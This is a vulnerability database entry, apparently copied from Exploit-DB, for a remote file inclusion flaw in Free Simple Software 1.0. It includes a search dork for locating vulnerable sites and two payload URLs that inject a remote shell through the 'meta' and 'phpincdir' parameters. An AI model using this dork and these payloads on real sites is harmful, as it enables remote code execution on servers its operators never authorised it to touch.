Free Simple Software V1.0

vendor:

Free Simple Software

by:

Dr.$audi

9,3

CVSS

HIGH

Remote File Inclusion (RFI)

CWE

Product Name: Free Simple Software

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:freesimplesoft:free_simple_software:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

This vulnerability allows an attacker to include a remote file on the web server. This can be exploited to execute arbitrary PHP code on the vulnerable system. The vulnerability is located in the 'themes/default/index.php' script with the 'meta' and 'phpincdir' parameters.

Mitigation:

The best way to mitigate this vulnerability is to restrict access to the vulnerable script and to validate all input data.

Source

Exploit-DB raw data:

########################################################
###  Free Simple Software V1.0  ###                                                  
#By :  Dr.$audi  ( SauDi ViRuS TeaM )                           	             
#By : http://Sa-ViRuS.CoM                                             	 	     
#Email : Mon7b6@Gmail.com         
#Dork: Powered by free simple software     	                       	        	     
#Greets : RENO , Dr.php , ! BaD BoY ! , Gov.HaCkEr , Mind , AnTi SeCuRe 
########################################################
Script HomePage: www.freesimplesoft.com				      #
########################################################
#RFI:                                                                                                     
# http://site/path/themes/default/index.php?meta=[Shell URL]?
# http://site/path/themes/default/index.php?phpincdir=[Shell URL]?
########################################################